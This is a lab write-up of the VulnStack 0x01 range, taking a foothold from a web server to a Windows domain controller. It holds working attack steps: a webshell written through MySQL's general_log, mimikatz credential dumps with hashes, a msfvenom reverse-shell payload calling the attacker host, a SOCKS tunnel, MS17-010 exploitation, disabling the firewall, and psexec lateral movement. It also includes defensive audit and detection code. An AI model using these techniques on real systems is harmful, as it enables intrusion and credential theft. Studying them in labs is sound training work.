VulnStack 0x01

Learned from:

黑白天-jen

从外网到域控 (From the external network to the domain controller)

Download: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

Basic information

Name     Host                              Password   Role
win7     192.168.52.143 | 192.168.21.145   xzasLXR1   web server
win2k3   192.168.52.141                    xzasLXR1   domain member
win2008  192.168.52.138                    xzas@157   domain controller
kali     192.168.21.129                               attacker

Win7

Webshell

dirsearch results

/yxcms

/phpmyAdmin

/phpMyAdmin

Lesson: a good wordlist matters. I nearly got stuck simply because I couldn't find a suitable one; fine, I'll just add yxcms to the wordlist (lol).

yxcms

  • Visit yxcms

The form in the bottom-right corner gives a hint:

Enter via /index.php?r=admin. Backend username: admin; password: 123456. Please change the default password after logging in.

  • Visit the backend

http://192.168.21.145/yxcms/index.php?r=admin

Username   Password
admin      123456

  • Webshell

Use the page-editing feature to write a webshell.

I still prefer AntSword.

phpMyAdmin

Visit phpMyAdmin

Use the default credentials

Username   Password
root       root

Common ways to get a shell through MySQL:
1. Write a file directly with SELECT ... INTO OUTFILE
2. Enable the general query log and write to it
3. Use the slow query log
4. Use the error log
5. Exploit the local file inclusion vulnerability in phpMyAdmin 4.8.x

  • Check secure_file_priv

Note that secure_file_priv is read-only (it cannot be changed at runtime).

  • Use the log method

    • Check the current settings

    show global variables like "%genera%";

    Variable_name      Value
    general_log        OFF
    general_log_file   C:\phpStudy\MySQL\data\stu1.log

    • Change the settings and the log file path

    set global general_log='ON';
    set global general_log_file='C:/phpStudy/WWW/fe1w0.php';
    select '';

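A defender-side check for the log-redirection trick above, added here as an example (it is not code from the original post or the lab): secure_file_priv only restricts INTO OUTFILE and LOAD_FILE(), it does not govern where the server writes its own log files, so the logging variables have to be audited separately. The variable values, the web root path and the function names are my own constructed assumptions modelled on the lab.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample in the shape of `show global variables` output, mirroring the
# lab's weak state after the general log was pointed into the web root.
GLOBAL_VARS = {
    "secure_file_priv": "NULL",   # blocks INTO OUTFILE / LOAD_FILE(), not log writes
    "general_log": "ON",
    "general_log_file": "C:/phpStudy/WWW/fe1w0.php",
    "slow_query_log": "OFF",
    "slow_query_log_file": "C:/phpStudy/MySQL/data/stu1-slow.log",
    "log_error": "C:/phpStudy/MySQL/data/stu1.err",
}
WEB_ROOTS = ["C:/phpStudy/WWW"]          # assumed document root of the phpStudy stack
EXEC_EXT = {".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp"}

def under_web_root(path, web_roots):
    """True if `path` lies inside any web root (case-insensitive, / or \\ separators)."""
    p = PureWindowsPath(path)
    return any(PureWindowsPath(root) in p.parents for root in web_roots)

def audit_log_targets(gvars, web_roots):
    """Return (severity, variable, reason) for log targets that an account with
    SUPER could have redirected; an empty list means the log settings look sane."""
    findings = []
    for var in ("general_log_file", "slow_query_log_file", "log_error"):
        path = gvars.get(var, "")
        if not path or path.upper() == "NULL":
            continue
        if under_web_root(path, web_roots):
            findings.append(("high", var, f"log written under web root: {path}"))
        if PureWindowsPath(path).suffix.lower() in EXEC_EXT:
            findings.append(("high", var, f"log file has executable extension: {path}"))
    if gvars.get("general_log", "OFF").upper() == "ON":
        findings.append(("medium", "general_log",
                         "general query log is ON; every statement is persisted to disk"))
    return findings

# Runtime changes to log targets should only ever come from an administrator; any
# such statement issued through the web application's DB account is a red flag.
SET_LOG_TARGET = re.compile(
    r"\bset\s+global\s+(general_log_file|slow_query_log_file|log_error|general_log)\s*=", re.I)

def flag_statements(statements):
    """Filter SQL statements (e.g. from an audit log) down to those that retarget
    or enable MySQL's own log files."""
    return [s for s in statements if SET_LOG_TARGET.search(s)]
```

The real fix is not to grant SUPER to the application's database account and to pin general_log_file in the option file; the audit then only confirms nothing drifted.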

Information gathering

I found that AntSword sometimes has bugs when returning command output.

Basics

Local host information gathering

Command                        Description
net view                       Get computer names in the current group; list computers in the same domain/workgroup
net user                       Query user information
query user || qwinsta          Query currently logged-on users
net localgroup administrators  Query the local Administrators group; on a domain-joined machine this usually reveals some domain information
ipconfig /all                  Query the network configuration; the DNS suffix tells you whether a domain exists
nslookup                       Resolve the domain name's IP address with nslookup (reverse lookup) and compare it to determine whether the domain controller and the DNS server are the same machine; dig works too
systeminfo                     Get system information
tasklist                       Query process information, e.g. to check for antivirus software
netstat -ano                   Show port information

There are other commonly used commands too.

Details:

C:\tmp> net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
GOD\Domain Admins
liukaifeng01
命令成功完成。

C:\tmp> systeminfo
主机名:           STU1
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          成员工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户

Domain information gathering

  • whoami /all: query the domain SID

  • net user test1 /domain: query details of the specified account

  • net config workstation: query the current logon domain and logged-on user

  • net time /domain

    There are generally three cases:

    • A domain exists but the current user is not a domain user: the output says permissions are insufficient
    • A domain exists and the current user is a domain user
    • The current network is a workgroup; there is no domain

  • net group "Domain Controllers" /domain: find the domain controllers

WMIC scripts can also be used to collect this information:

http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

Probing other hosts in the domain

Here an ARP scan and nbtscan are used to gather information about the domain.

arp-scan_64.exe -t 192.168.52.1/20 >1.txt

Reply that 00:0C:29:86:6F:BA is 192.168.52.138 in 15.289000
Reply that 00:0C:29:2A:99:BC is 192.168.52.141 in 16.001900
Reply that 00:0C:29:A3:B3:2A is 192.168.52.143 in 0.040600
Reply that 00:0C:29:A3:B3:2A is 192.168.52.255 in 0.048100

C:\tmp> nbtscan-1.0.35.exe 192.168.52.0/24 >z.txt
*timeout (normal end of scan)
192.168.52.138  GOD\OWA                         SHARING DC
192.168.52.141  GOD\ROOT-TVI862UBEH             SHARING
192.168.52.143  GOD\STU1                        SHARING

IP               Note
192.168.52.138   DC
192.168.52.141   another host in the domain
192.168.52.143   current machine (win7)

Local passwords

Upload mimikatz

Note: it's best to get a reverse cmd.exe with nc first, since the output may not appear in AntSword.

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log

Authentication Id : 0 ; 2568929 (00000000:002732e1)
Session           : Interactive from 1
User Name         : Administrator
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2020/5/9 15:01:10
SID               : S-1-5-21-2952760202-1353902439-2381784089-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : GOD
         * LM         : 1121a434316e2b1ec2265b23734e0dac
         * NTLM       : b8529ce2d4fa8ba1adc67295abefe12e
         * SHA1       : 11540fad9cb5ed35fe7f599aef2b0fa58c0fdec4
        tspkg :
         * Username   : Administrator
         * Domain     : GOD
         * Password   : xzasLXR1

Disable the firewall

Into the intranet

Generate the trojan backdoor

# kali
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.21.129 lport=23333 -f exe > /root/Desktop/reverse_tcp.exe

Upload the trojan to win7 and run it.


Metasploit listener on kali

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.21.129
LHOST => 192.168.21.129
msf5 exploit(multi/handler) > set LPORT 23334
LPORT => 23334
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.21.129:23334
[*] Sending stage (206403 bytes) to 192.168.21.145
[*] Meterpreter session 1 opened (192.168.21.129:23334 -> 192.168.21.145:7746) at 2020-05-09 10:02:12 -0400

meterpreter > pwd
C:\tmp
meterpre

Proxy

But for kali to reach the intranet directly, we also need to set up a proxy.

Bring out the orange artifact, Earthworm (EW):

https://bbs.ichunqiu.com/thread-36219-1-2.html

Reverse SOCKS v5 server

Again, ew_for_Win.exe first has to be uploaded to the border host.

  • kali

Edit the proxychains configuration

File: /etc/proxychains.conf

Change it to:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
#socks5 192.168.21.144 1080
socks5 127.0.0.1 1080

Listen on port 1080:

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

  • win7

ew_for_Win.exe -s rssocks -d 192.168.21.129 -e 8888

Proxying msf

Port scanning

msf5 > use scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.52.138 192.168.52.141
RHOSTS => 192.168.52.138 192.168.52.141
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 3389,139,445,80,8080,21
PORTS => 3389,139,445,80,8080,21
msf5 auxiliary(scanner/portscan/tcp) > set threads 65
threads => 65
msf5 auxiliary(scanner/portscan/tcp) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:80-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:80-<><>-OK

[+] 192.168.52.138:       - 192.168.52.138:139 - TCP OPEN
<><>-OK
[+] 192.168.52.138:       - 192.168.52.138:80 - TCP OPEN
<><>-OK
[+] 192.168.52.138:       - 192.168.52.138:445 - TCP OPEN
<><>-OK
[+] 192.168.52.141:       - 192.168.52.141:139 - TCP OPEN
<><>-OK
[+] 192.168.52.141:       - 192.168.52.141:21 - TCP OPEN
<><>-OK
[+] 192.168.52.141:       - 192.168.52.141:445 - TCP OPEN
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
[*] Scanned 1 of 2 hosts (50% complete)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed

MS17-010

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

Scan

msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.52.141 192.168.52.138
RHOSTS => 192.168.52.141 192.168.52.138
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:135-<><>-OK

[+] 192.168.52.141:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] Scanned 1 of 2 hosts (50% complete)
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:135-<><>-OK
[+] 192.168.52.138:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

Exploit: error

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

But it failed.

Auxiliary module: disable the firewall

msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/admin/smb/ms17_010_command
msf5 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND netsh advfirewall set allprofiles state off
COMMAND => netsh advfirewall set allprofiles state off
msf5 auxiliary(admin/smb/ms17_010_command) > run
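A detection example from the defender's side, added here and not part of the original post. It covers two things the walkthrough does on the victims: the host and domain enumeration commands from the information-gathering tables earlier (net view / net user / net group ... /domain, systeminfo, nbtscan and so on), and the firewall-disable command pushed through ms17_010_command just above. It runs over constructed process-creation records (the fields of a Windows Security 4688 event, simplified) and flags recon spawned by a web server process (the webshell case on win7), a burst of recon commands on one host, and any `netsh advfirewall ... state off`. The record format, parent-image list and thresholds are my own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records: time|host|user|parent image|command line
# (the fields of a Windows Security 4688 event that the detection needs). Not lab telemetry.
EVENTS = [
    "2020-05-09T09:00:00|STU1|GOD\\liukaifeng01|explorer.exe|cmd.exe /c ipconfig /all",
    "2020-05-09T15:10:01|STU1|GOD\\Administrator|httpd.exe|cmd.exe /c net localgroup administrators",
    "2020-05-09T15:10:05|STU1|GOD\\Administrator|httpd.exe|cmd.exe /c systeminfo",
    "2020-05-09T15:10:09|STU1|GOD\\Administrator|httpd.exe|cmd.exe /c net group \"Domain Controllers\" /domain",
    "2020-05-09T15:10:30|STU1|GOD\\Administrator|httpd.exe|cmd.exe /c nbtscan-1.0.35.exe 192.168.52.0/24",
    "2020-05-10T00:40:12|OWA|NT AUTHORITY\\SYSTEM|spoolsv.exe|cmd.exe /c netsh advfirewall set allprofiles state off",
]

RECON = re.compile(
    r"\b(net (view|user|group|localgroup|config|time)|whoami|ipconfig|systeminfo|tasklist|"
    r"netstat|query user|qwinsta|nslookup|nbtscan|arp-scan)\b", re.I)
FIREWALL_OFF = re.compile(r"\bnetsh\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)
WEB_PARENTS = {"httpd.exe", "php-cgi.exe", "w3wp.exe", "nginx.exe"}  # web server images (assumed list)

def parse(line):
    ts, host, user, parent, cmd = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "parent": parent.lower(), "cmd": cmd}

def detect(lines, window=timedelta(minutes=5), threshold=3):
    """Return (rule, host, detail) alerts in time order."""
    alerts, recent = [], defaultdict(list)   # recent recon timestamps per host
    for ev in sorted(map(parse, lines), key=lambda e: e["ts"]):
        if FIREWALL_OFF.search(ev["cmd"]):
            alerts.append(("firewall_disabled", ev["host"], ev["cmd"]))
        if not RECON.search(ev["cmd"]):
            continue
        if ev["parent"] in WEB_PARENTS:     # shell commands spawned by a web server = webshell
            alerts.append(("webshell_recon", ev["host"], ev["cmd"]))
        # sliding window of recon commands on this host; fire once per burst, not per command
        hits = [t for t in recent[ev["host"]] if ev["ts"] - t <= window] + [ev["ts"]]
        recent[ev["host"]] = hits
        if len(hits) == threshold:
            alerts.append(("recon_burst", ev["host"],
                           f"{threshold} recon commands within {window}"))
    return alerts
```

The single ipconfig run from explorer.exe in the sample produces no alert: an admin's occasional command is normal, a run of them from httpd.exe is not.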

Then run the exploit again.

Errors can still occur, and it's really unstable.

Process migration with run post/windows/manage/migrate can be used, but the result is mediocre; it still dies randomly. I suspect the proxy is to blame.

mimikatz

Afterwards, mimikatz can be used to get passwords.

r8 needs to be logged in first; then it works normally.

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;45394   NTLM
0;995     Negotiate  NT AUTHORITY  IUSR
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  GOD           OWA$           23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;999     Negotiate  GOD           OWA$           23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;329096  Kerberos   GOD           liukaifeng01   xzas@157
0;329127  Negotiate  GOD           liukaifeng01   xzas@157

Exploit: success

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/psexec) > set SMBDomain god.org
SMBDomain => god.org
msf5 exploit(windows/smb/psexec) > set SMBUSER liukaifeng01
SMBUSER => liukaifeng01
msf5 exploit(windows/smb/psexec) > set SMBPASS xzas@157
SMBPASS => xzas@157
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set LPORT 8553
LPORT => 8553

Much more stable than before.

CobaltStrike

Official site

link : https://www.cobaltstrike.com

There are translated videos by predecessors on Bilibili

link : https://www.bilibili.com/video/BV1S7411k7pU/

Honestly, if you just follow 合天 and friends on Bilibili, you'll get to know basically every infosec video and uploader there.

Other learning links:

https://www.jianshu.com/p/8d823adbc6b5

CS 4.0: still to try

Afterword

Ahhh, there is still so much I don't know. Once this practice is done,

I'll properly study 《内网安全攻防》.

Comments

  1. fe1w0 (blog owner)
    7 months ago
    2020-5-10 3:20:28

    Too hard; I'll record a video after the competition is over.
